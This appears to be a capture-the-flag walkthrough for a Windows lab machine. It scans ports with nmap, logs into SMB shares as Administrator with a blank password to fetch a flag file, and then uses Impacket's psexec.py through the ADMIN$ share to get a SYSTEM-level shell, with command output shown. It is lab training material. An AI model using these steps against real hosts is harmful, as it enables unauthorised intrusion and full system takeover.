Port scan first, exchange ip with your machines IP address.
sudo nmap -sV -Pn ip
We see that port 445 is open, which is a Server Message Block (SMB) port. Let's list all shares and go for the Windows default username "Administrator" to do that:
smbclient -L ip -U Administrator password: hit enter
Output:
Sharename Type Comment --------- ---- ------- ADMIN$ Disk Remote Admin C$ Disk Default share IPC$ IPC Remote IPC
Let's check out the C share
smbclient \\\\ip\\C$ -U Administrator password: hit enter
Then we can navigate to the Desktop and download the file flag.txt:
cd \Users\Administrator\Desktop get flag.txt ctrl + c
Then back on our system, we can view the flag:
cat flag.txt
Success! This was one way to pwn this machine. But there is another, where we even can get an interactive system shell!
Option 2: Doing it with the Impacked tool psexec.py
Because we can access the ADMIN$ share as well, we can use psexec.py to get an interactive system shell. The command for our machine is (exchange ip with your machines IP address):
cd impacket/examples python3 psexec.py administrator@ip hit enter for the password
Outputs:
[*] Requesting shares on 10.129.194.113..... [*] Found writable share ADMIN$ [*] Uploading file GhsQaPpi.exe [*] Opening SVCManager on 10.129.194.113..... [*] Creating service TxXK on 10.129.194.113..... [*] Starting service TxXK..... [!] Press help for extra shell commands Microsoft Windows [Version 10.0.17763.107] (c) 2018 Microsoft Corporation. All rights reserved.
Running the command:
whoami
Returns:
nt authority\system
Which is the highest of all privileges. Now we can navigate freely and get the flag:
cd ..\.. cd \Users\Administrator\Desktop type flag.txt